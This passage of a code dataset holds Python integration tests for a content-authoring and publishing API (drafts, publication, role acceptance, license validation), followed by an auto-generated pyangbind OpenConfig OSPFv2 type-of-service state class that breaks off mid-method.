self.assertEqual(result['state'], 'Waiting for moderation')
self.assertEqual(result['publication'], unicode(publication_id))
def test_publish_revision_single_page(self):
id = '91cb5f28-2b8a-4324-9373-dac1d617bc24'
# If the content already exists, because of other tests, remove it.
from ..storage import storage
document = storage.get(id=id)
if document is not None:
storage.remove(document)
storage.persist()
self.logout()
# Create the revision
self.login('Rasmus1975')
post_data = {
'id': u'91cb5f28-2b8a-4324-9373-dac1d617bc24@1',
'title': u'Turning DNA through resonance',
'abstract': u'Theories on turning DNA structures',
'language': u'en',
'subjects': [u'Science and Technology'],
'keywords': [u'DNA', u'resonance'],
}
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
self.assert_cors_headers(response)
page = response.json
# Publish the revision
post_data = {
'submitlog': 'Publishing a revision',
'items': [
page['id'],
],
}
response = self.testapp.post_json(
'/publish', post_data, status=200)
publication_info = response.json
self.assertEqual(publication_info['state'], 'Done/Success')
self.assertEqual(publication_info['mapping'][page['id']],
'{}@2'.format(page['id']))
def test_edit_after_publish(self):
# create a new page
post_data = {
'title': 'Page one',
'content': '<html><body><p>Contents of Page one</p></body></html>',
'abstract': 'Learn how to etc etc',
}
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
page_one = response.json
post_data = {
'submitlog': u'Nueva versión!',
'items': [
page_one['id'],
],
}
response = self.testapp.post_json(
'/publish', post_data, expect_errors=True)
publish = response.json
self.assertEqual(publish['state'], 'Done/Success')
self.assertEqual(list(publish['mapping'].values()),
['{}@1'.format(page_one['id'])])
# authoring should have the document in the db with status
# "Done/Success"
response = self.testapp.get('/contents/{}@draft.json'.format(
page_one['id']), status=200)
body = response.json
self.assertEqual(body['state'], 'Done/Success')
# editing the content again
post_data = {
'id': '{}@1'.format(page_one['id']),
'title': 'Page one v2',
'content': '<html><body><p>Contents of Page one</p></body></html>',
'abstract': 'Learn how to etc etc',
}
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
page_one = response.json
self.assertEqual(page_one['state'], 'Draft')
# post with the same id should return the same draft
post_data = {
'id': '{}@1'.format(page_one['id']),
}
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
page_one = response.json
self.assertEqual(page_one['state'], 'Draft')
self.assertEqual(page_one['title'], 'Page one v2')
# publish the next version
post_data = {
'submitlog': u'Nueva versión!',
'items': [
page_one['id'],
],
}
response = self.testapp.post_json(
'/publish', post_data, expect_errors=True)
publish = response.json
self.assertEqual(publish['state'], 'Done/Success')
self.assertEqual(list(publish['mapping'].values()),
['{}@2'.format(page_one['id'])])
def test_delete_after_publish(self):
# create a new page
post_data = {
'title': 'Page one',
'content': '<html><body><p>Contents of Page one</p></body></html>',
'abstract': 'Learn how to etc etc',
}
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
page_one = response.json
post_data = {
'submitlog': u'Nueva versión!',
'items': [
page_one['id'],
],
}
response = self.testapp.post_json(
'/publish', post_data, expect_errors=True)
publish = response.json
self.assertEqual(publish['state'], 'Done/Success')
self.assertEqual(list(publish['mapping'].values()),
['{}@1'.format(page_one['id'])])
# authoring should have the document in the db with status
# "Done/Success"
response = self.testapp.get('/contents/{}@draft.json'.format(
page_one['id']), status=200)
body = response.json
self.assertEqual(body['state'], 'Done/Success')
# delete the content from authoring
response = self.testapp.delete(
'/contents/{}@1'.format(page_one['id']), post_data, status=200)
self.testapp.get('/contents/{}@1'.format(page_one['id']), status=404)
def test_publish_after_error(self):
# create a new page
post_data = {
'title': 'Page one',
'content': '<html><body><p><img src="a.png" /></p></body></html>',
'abstract': 'Learn how to etc etc',
}
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
page_one = response.json
post_data = {
'submitlog': u'Nueva versión!',
'items': [
page_one['id'],
],
}
response = self.testapp.post_json(
'/publish', post_data, expect_errors=True)
self.assertEqual(response.status, '400 Bad Request')
self.assertEqual(response._headers['publish_state'], 'Failed/Error')
self.assertEqual(response._headers['error_type'], 'InvalidReference')
# authoring should have the document in the db with status
# "Failed/Error"
response = self.testapp.get('/contents/{}@draft.json'.format(
page_one['id']), status=200)
body = response.json
self.assertEqual(body['state'], 'Failed/Error')
# fix up the invalid reference
post_data = {
'id': '{}'.format(page_one['id']),
'title': 'Page one v2',
'content': '<html><body><p>Contents of Page one</p></body></html>',
'abstract': 'Learn how to etc etc',
}
response = self.testapp.put_json(
'/contents/{}@draft.json'.format(page_one['id']), post_data)
page_one = response.json
self.assertEqual(page_one['state'], 'Draft')
# publish again
post_data = {
'submitlog': u'Nueva versión!',
'items': [
page_one['id'],
],
}
response = self.testapp.post_json(
'/publish', post_data, expect_errors=True)
publish = response.json
self.assertEqual(publish['state'], 'Done/Success')
self.assertEqual(list(publish['mapping'].values()),
['{}@1'.format(page_one['id'])])
def test_publish_w_multiple_users(self):
# create a new page
post_data = {
'title': 'Page one',
'content': '<html><body><p>Contents of Page one</p></body></html>',
'abstract': 'Learn how to etc etc',
}
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
page = response.json
# add an editor
post_data = {
'editors': [{'id': 'user2'}],
}
self.testapp.put_json(
'/contents/{}@draft.json'.format(page['id']), post_data,
status=200)
# edit some more
post_data = {
'title': 'Page one with an editor',
}
self.testapp.put_json(
'/contents/{}@draft.json'.format(page['id']), post_data,
status=200)
post_data = {
'submitlog': u'Nueva versión!',
'items': [page['id']],
}
response = self.testapp.post_json(
'/publish', post_data, status=200)
# publication should be waiting for acceptance
publish = response.json
self.assertEqual(publish['state'], 'Waiting for acceptance')
self.assertEqual(list(publish['mapping'].values()),
['{}@1'.format(page['id'])])
# login as user2 and accept roles
self.logout()
self.login('user2')
post_data = {
'license': True,
'roles': [{'role': 'editors', 'hasAccepted': True}],
}
self.testapp.post_json(
'/contents/{}@draft/acceptance'.format(page['id']),
post_data, status=200)
# publish the content again
self.logout()
self.login('user1')
post_data = {
'submitlog': u'Nueva versión!',
'items': [page['id']],
}
response = self.testapp.post_json(
'/publish', post_data, status=200)
# publication should be waiting for acceptance
publish = response.json
self.assertEqual(publish['state'], 'Done/Success')
self.assertEqual(list(publish['mapping'].values()),
['{}@1'.format(page['id'])])
def test_acceptance(self):
# create a new page
post_data = {
'title': 'My Page',
}
created = datetime.datetime.now(TZINFO)
formatted_created = created.astimezone(TZINFO).isoformat()
with mock.patch('datetime.datetime') as mock_datetime:
mock_datetime.now.return_value = created
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
page = response.json
# user1 has accepted all their roles
response = self.testapp.get(
'/contents/{}@draft/acceptance'.format(page['id']))
acceptance = response.json
self.assertEqual(acceptance, {
u'license': {
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'name': u'Creative Commons Attribution License',
u'code': u'by',
u'version': u'4.0',
},
u'url': u'http://localhost/contents/{}%40draft.json'.format(
page['id']),
u'id': page['id'],
u'title': u'My Page',
u'user': u'user1',
u'roles': [{u'assignmentDate': formatted_created,
u'hasAccepted': True,
u'requester': u'user1',
u'role': u'authors'},
{u'assignmentDate': formatted_created,
u'hasAccepted': True,
u'requester': u'user1',
u'role': u'copyright_holders'},
{u'assignmentDate': formatted_created,
u'hasAccepted': True,
u'requester': u'user1',
u'role': u'publishers'}],
})
# add user2 to authors and editors, add user1 to editors, add user3 to
# translators, licensors and publishers, add user4 to translators
post_data = {
'authors': page['authors'] + [{'id': 'user2'}],
'editors': page['editors'] + [{'id': 'user1'}, {'id': 'user2'}],
'translators': page['translators'] +
[{'id': 'user3'}, {'id': 'user4'}],
'licensors': page['licensors'] + [{'id': 'user3'}],
'publishers': page['publishers'] + [{'id': 'user3'}],
}
now = datetime.datetime.now(TZINFO)
formatted_now = now.astimezone(TZINFO).isoformat()
with mock.patch('datetime.datetime') as mock_datetime:
mock_datetime.now.return_value = now
response = self.testapp.put_json(
'/contents/{}@draft.json'.format(page['id']), post_data,
status=200)
page = response.json
# user1 should accept the editor role automatically
response = self.testapp.get(
'/contents/{}@draft/acceptance'.format(page['id']))
acceptance = response.json
self.assertEqual(acceptance, {
u'license': {
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'name': u'Creative Commons Attribution License',
u'code': u'by',
u'version': u'4.0',
},
u'url': u'http://localhost/contents/{}%40draft.json'.format(
page['id']),
u'id': page['id'],
u'title': u'My Page',
u'user': u'user1',
u'roles': [{u'assignmentDate': formatted_created,
u'hasAccepted': True,
u'requester': u'user1',
u'role': u'authors'},
{u'assignmentDate': formatted_created,
u'hasAccepted': True,
u'requester': u'user1',
u'role': u'copyright_holders'},
{u'assignmentDate': formatted_now,
u'hasAccepted': True,
u'requester': u'user1',
u'role': u'editors'},
{u'assignmentDate': formatted_created,
u'hasAccepted': True,
u'requester': u'user1',
u'role': u'publishers'}],
})
# log in as user2
self.logout()
self.login('user2')
# user2 should have authors and editors in acceptance info
response = self.testapp.get(
'/contents/{}@draft/acceptance'.format(page['id']))
acceptance = response.json
self.assertEqual(acceptance, {
u'license': {
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'name': u'Creative Commons Attribution License',
u'code': u'by',
u'version': u'4.0',
},
u'url': u'http://localhost/contents/{}%40draft.json'.format(
page['id']),
u'id': page['id'],
u'title': u'My Page',
u'user': u'user2',
u'roles': [{u'role': u'authors',
u'assignmentDate': formatted_now,
u'requester': u'user1',
u'hasAccepted': None},
{u'role': u'editors',
u'assignmentDate': formatted_now,
u'requester': u'user1',
u'hasAccepted': None}],
})
# user2 accepts the roles
post_data = {
'license': True,
'roles': [{'role': 'editors', 'hasAccepted': True},
{'role': 'authors', 'hasAccepted': True}],
}
self.testapp.post_json(
'/contents/{}@draft/acceptance'.format(page['id']),
post_data, status=200)
# checks the acceptance info again (all roles accepted)
response = self.testapp.get(
'/contents/{}@draft/acceptance'.format(page['id']))
acceptance = response.json
self.assertEqual(acceptance, {
u'license': {
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'name': u'Creative Commons Attribution License',
u'code': u'by',
u'version': u'4.0',
},
u'url': u'http://localhost/contents/{}%40draft.json'.format(
page['id']),
u'id': page['id'],
u'title': u'My Page',
u'user': u'user2',
u'roles': [{u'role': u'authors',
u'assignmentDate': formatted_now,
u'requester': u'user1',
u'hasAccepted': True},
{u'role': u'editors',
u'assignmentDate': formatted_now,
u'requester': u'user1',
u'hasAccepted': True}],
})
# login as user3
self.logout()
self.login('user3')
# user3 should have translators, licensors and publishers in the
# acceptance info
response = self.testapp.get(
'/contents/{}@draft/acceptance'.format(page['id']))
acceptance = response.json
self.assertEqual(acceptance, {
u'license': {
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'name': u'Creative Commons Attribution License',
u'code': u'by',
u'version': u'4.0',
},
u'url': u'http://localhost/contents/{}%40draft.json'.format(
page['id']),
u'id': page['id'],
u'title': u'My Page',
u'user': u'user3',
u'roles': [{u'role': u'copyright_holders',
u'assignmentDate': formatted_now,
u'requester': u'user1',
u'hasAccepted': None},
{u'role': u'publishers',
u'assignmentDate': formatted_now,
u'requester': u'user1',
u'hasAccepted': None},
{u'role': u'translators',
u'assignmentDate': formatted_now,
u'requester': u'user1',
u'hasAccepted': None}],
})
# user3 rejects their roles
post_data = {
'license': False,
'roles': [{'role': 'translators', 'hasAccepted': False},
{'role': 'copyright_holders', 'hasAccepted': False},
{'role': 'publishers', 'hasAccepted': False}],
}
response = self.testapp.post_json(
'/contents/{}@draft/acceptance'.format(page['id']),
post_data, status=200)
# check the acceptance info for user3 again
response = self.testapp.get(
'/contents/{}@draft/acceptance'.format(page['id']))
acceptance = response.json
self.assertEqual(acceptance['roles'], [
{u'role': u'copyright_holders',
u'assignmentDate': formatted_now,
u'requester': u'user1',
u'hasAccepted': False},
{u'role': u'publishers',
u'assignmentDate': formatted_now,
u'requester': u'user1',
u'hasAccepted': False},
{u'role': u'translators',
u'assignmentDate': formatted_now,
u'requester': u'user1',
u'hasAccepted': False}])
# user3 should still be able to view the content, but not edit
self.testapp.get(
'/contents/{}@draft/acceptance'.format(page['id']))
self.testapp.get(
'/contents/{}@draft.json'.format(page['id']))
self.testapp.put_json(
'/contents/{}@draft.json'.format(page['id']), {}, status=403)
# user3 changes their mind and accepts one of their roles
post_data = {
'license': True,
'roles': [{'role': 'copyright_holders', 'hasAccepted': True}],
}
response = self.testapp.post_json(
'/contents/{}@draft/acceptance'.format(page['id']),
post_data, status=200)
# check the acceptance info for user3 again
response = self.testapp.get(
'/contents/{}@draft/acceptance'.format(page['id']))
acceptance = response.json
self.assertEqual(acceptance['roles'], [
{u'role': u'copyright_holders',
u'assignmentDate': formatted_now,
u'requester': u'user1',
u'hasAccepted': True},
{u'role': u'publishers',
u'assignmentDate': formatted_now,
u'requester': u'user1',
u'hasAccepted': False},
{u'role': u'translators',
u'assignmentDate': formatted_now,
u'requester': u'user1',
u'hasAccepted': False}])
# user3 should be able to view and edit the content
self.testapp.get(
'/contents/{}@draft/acceptance'.format(page['id']))
self.testapp.get(
'/contents/{}@draft.json'.format(page['id']))
self.testapp.put_json(
'/contents/{}@draft.json'.format(page['id']), {})
# content should be in the workspace
response = self.testapp.get('/users/contents')
workspace = response.json
content_ids = [i['id'] for i in workspace['results']['items']]
self.assertIn('{}@draft'.format(page['id']), content_ids)
# login as user4
self.logout()
self.login('user4')
# user4 should have translators in the acceptance info
response = self.testapp.get(
'/contents/{}@draft/acceptance'.format(page['id']))
acceptance = response.json
self.assertEqual(acceptance, {
u'license': {
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'name': u'Creative Commons Attribution License',
u'code': u'by',
u'version': u'4.0',
},
u'url': u'http://localhost/contents/{}%40draft.json'.format(
page['id']),
u'id': page['id'],
u'title': u'My Page',
u'user': u'user4',
u'roles': [{u'role': u'translators',
u'assignmentDate': formatted_now,
u'requester': u'user1',
u'hasAccepted': None}],
})
# user4 accepts their roles without accepting the license
post_data = {
'license': False,
'roles': [{'role': 'translators', 'hasAccepted': True}],
}
response = self.testapp.post_json(
'/contents/{}@draft/acceptance'.format(page['id']),
post_data, status=200)
# acceptance info is reset
response = self.testapp.get(
'/contents/{}@draft/acceptance'.format(page['id']))
acceptance = response.json
self.assertEqual(acceptance, {
u'license': {
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'name': u'Creative Commons Attribution License',
u'code': u'by',
u'version': u'4.0',
},
u'url': u'http://localhost/contents/{}%40draft.json'.format(
page['id']),
u'id': page['id'],
u'title': u'My Page',
u'user': u'user4',
u'roles': [{u'role': u'translators',
u'assignmentDate': formatted_now,
u'requester': u'user1',
u'hasAccepted': None}],
})
def test_publish_w_changed_license(self):
author_id = 'cnxcap'
# Post a page.
response = self.testapp.post_json('/users/contents', {
'title': 'Page one',
'content': '<html><body><p>Content of page one</p></body></html>',
'abstract': 'Learn how to etc etc',
}, status=201)
page1 = response.json
self.assert_cors_headers(response)
# Put an author on.
page1['authors'].append({'id': author_id, 'type': 'cnx-id'})
response = self.testapp.put_json('/contents/{}@draft.json'
.format(page1['id']), page1)
page1 = response.json
self.logout()
# Login as the author to accept the role and publish.
self.login(author_id)
self.testapp.post_json('/contents/{}@draft/acceptance'
.format(page1['id']),
{'license': True,
'roles': [{'role': 'authors',
'hasAccepted': True}]})
# Prepare the post data
from ..models import LICENSES
license = [l for l in LICENSES if l.code == 'by-nc-sa'][0]
post_data = {
'submitlog': 'Publishing a page as an author is working?',
'items': (page1['id'],),
'license': license.__json__(),
}
# Try to publish with a missing license url.
missing_info_post_data = deepcopy(post_data)
del missing_info_post_data['license']['url']
response = self.testapp.post_json('/publish', missing_info_post_data,
status=400)
self.assertIn("Missing license url", response.body)
# Try to publish with an invalid license.
invalid_post_data = deepcopy(post_data)
agpl_license_url = 'https://www.gnu.org/licenses/agpl-3.0'
invalid_post_data['license']['url'] = agpl_license_url
response = self.testapp.post_json('/publish', invalid_post_data,
status=400)
self.assertIn("Invalid license url", response.body)
# Publish under license by-nc-sa.
response = self.testapp.post_json('/publish', post_data, status=200)
self.assertEqual(response.json[u'state'], u'Done/Success')
expected_mapping = {page1['id']: '{}@1'.format(page1['id'])}
self.assertEqual(response.json[u'mapping'], expected_mapping)
self.assert_cors_headers(response)
# Grab the publication id for followup assertions.
publication_id = response.json['publication']
url = '/contents/{}@draft.json'.format(page1['id'])
response = self.testapp.get(url)
self.assertEqual(response.json['state'], 'Done/Success')
self.assertEqual(response.json['publication'],
str(publication_id))
self.assertEqual(response.json['license']['url'], license.url)
# Check publishing for the correct license and acceptance.
publishing_host = integration_test_settings()['publishing.url']
url = '/contents/{}/licensors'.format(page1['id'])
url = urljoin(publishing_host, url)
response = requests.get(url)
self.assertEqual(response.json()['license_url'], license.url)
self.assertEqual(
[l['has_accepted'] for l in response.json()['licensors']],
[True, True]
)
# Check archive for the correct license
archive_host = integration_test_settings()['archive.url']
url = '/contents/{}@1.json'.format(page1['id'])
url = urljoin(archive_host, url)
response = requests.get(url)
self.assertEqual(response.json()['license']['url'], license.url)
|
agpl-3.0
| 2,964,078,937,698,059,000
| 39.794775
| 121
| 0.510653
| false
| 4.054667
| true
| false
| false
|
napalm-automation/napalm-yang
|
napalm_yang/models/openconfig/network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/summary_lsa/types_of_service/type_of_service/state/__init__.py
|
1
|
20811
|
# -*- coding: utf-8 -*-
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from collections import OrderedDict
from decimal import Decimal
from bitarray import bitarray
import six
# PY3 support of some PY2 keywords (needs improved)
if six.PY3:
import builtins as __builtin__
long = int
elif six.PY2:
import __builtin__
class state(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance - based on the path /network-instances/network-instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa-types/lsa-type/lsas/lsa/summary-lsa/types-of-service/type-of-service/state. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: Per-TOS parameters for the LSA
"""
__slots__ = ("_path_helper", "_extmethods", "__tos", "__metric")
_yang_name = "state"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__tos = YANGDynClass(
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
is_leaf=True,
yang_name="tos",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=False,
)
self.__metric = YANGDynClass(
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..65535"]}, int_size=16
),
is_leaf=True,
yang_name="metric",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-ospf-types:ospf-metric",
is_config=False,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"protocols",
"protocol",
"ospfv2",
"areas",
"area",
"lsdb",
"lsa-types",
"lsa-type",
"lsas",
"lsa",
"summary-lsa",
"types-of-service",
"type-of-service",
"state",
]
def _get_tos(self):
"""
Getter method for tos, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/summary_lsa/types_of_service/type_of_service/state/tos (uint8)
YANG Description: OSPF encoding of the type of service referred to by this
LSA. Encoding for OSPF TOS are described in RFC2328.
"""
return self.__tos
def _set_tos(self, v, load=False):
"""
Setter method for tos, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/summary_lsa/types_of_service/type_of_service/state/tos (uint8)
If this variable is read-only (config: false) in the
source YANG file, then _set_tos is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_tos() directly.
YANG Description: OSPF encoding of the type of service referred to by this
LSA. Encoding for OSPF TOS are described in RFC2328.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
is_leaf=True,
yang_name="tos",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """tos must be of a type compatible with uint8""",
"defined-type": "uint8",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="tos", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint8', is_config=False)""",
}
)
self.__tos = t
if hasattr(self, "_set"):
self._set()
def _unset_tos(self):
self.__tos = YANGDynClass(
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
is_leaf=True,
yang_name="tos",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=False,
)
def _get_metric(self):
"""
Getter method for metric, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/summary_lsa/types_of_service/type_of_service/state/metric (oc-ospf-types:ospf-metric)
YANG Description: The metric value to be used for the TOS specified. This value
represents the cost of use of the link for the specific type
of service.
"""
return self.__metric
def _set_metric(self, v, load=False):
"""
Setter method for metric, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/summary_lsa/types_of_service/type_of_service/state/metric (oc-ospf-types:ospf-metric)
If this variable is read-only (config: false) in the
source YANG file, then _set_metric is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_metric() directly.
YANG Description: The metric value to be used for the TOS specified. This value
represents the cost of use of the link for the specific type
of service.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..65535"]}, int_size=16
),
is_leaf=True,
yang_name="metric",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-ospf-types:ospf-metric",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """metric must be of a type compatible with oc-ospf-types:ospf-metric""",
"defined-type": "oc-ospf-types:ospf-metric",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="metric", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='oc-ospf-types:ospf-metric', is_config=False)""",
}
)
self.__metric = t
if hasattr(self, "_set"):
self._set()
def _unset_metric(self):
self.__metric = YANGDynClass(
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..65535"]}, int_size=16
),
is_leaf=True,
yang_name="metric",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-ospf-types:ospf-metric",
is_config=False,
)
tos = __builtin__.property(_get_tos)
metric = __builtin__.property(_get_metric)
_pyangbind_elements = OrderedDict([("tos", tos), ("metric", metric)])
class state(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance-l2 - based on the path /network-instances/network-instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa-types/lsa-type/lsas/lsa/summary-lsa/types-of-service/type-of-service/state. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: Per-TOS parameters for the LSA
"""
__slots__ = ("_path_helper", "_extmethods", "__tos", "__metric")
_yang_name = "state"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__tos = YANGDynClass(
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
is_leaf=True,
yang_name="tos",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=False,
)
self.__metric = YANGDynClass(
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..65535"]}, int_size=16
),
is_leaf=True,
yang_name="metric",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-ospf-types:ospf-metric",
is_config=False,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"protocols",
"protocol",
"ospfv2",
"areas",
"area",
"lsdb",
"lsa-types",
"lsa-type",
"lsas",
"lsa",
"summary-lsa",
"types-of-service",
"type-of-service",
"state",
]
def _get_tos(self):
"""
Getter method for tos, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/summary_lsa/types_of_service/type_of_service/state/tos (uint8)
YANG Description: OSPF encoding of the type of service referred to by this
LSA. Encoding for OSPF TOS are described in RFC2328.
"""
return self.__tos
def _set_tos(self, v, load=False):
"""
Setter method for tos, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/summary_lsa/types_of_service/type_of_service/state/tos (uint8)
If this variable is read-only (config: false) in the
source YANG file, then _set_tos is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_tos() directly.
YANG Description: OSPF encoding of the type of service referred to by this
LSA. Encoding for OSPF TOS are described in RFC2328.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
is_leaf=True,
yang_name="tos",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """tos must be of a type compatible with uint8""",
"defined-type": "uint8",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="tos", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint8', is_config=False)""",
}
)
self.__tos = t
if hasattr(self, "_set"):
self._set()
def _unset_tos(self):
self.__tos = YANGDynClass(
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
is_leaf=True,
yang_name="tos",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=False,
)
def _get_metric(self):
"""
Getter method for metric, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/summary_lsa/types_of_service/type_of_service/state/metric (oc-ospf-types:ospf-metric)
YANG Description: The metric value to be used for the TOS specified. This value
represents the cost of use of the link for the specific type
of service.
"""
return self.__metric
def _set_metric(self, v, load=False):
"""
Setter method for metric, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/summary_lsa/types_of_service/type_of_service/state/metric (oc-ospf-types:ospf-metric)
If this variable is read-only (config: false) in the
source YANG file, then _set_metric is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_metric() directly.
YANG Description: The metric value to be used for the TOS specified. This value
represents the cost of use of the link for the specific type
of service.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..65535"]}, int_size=16
),
is_leaf=True,
yang_name="metric",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
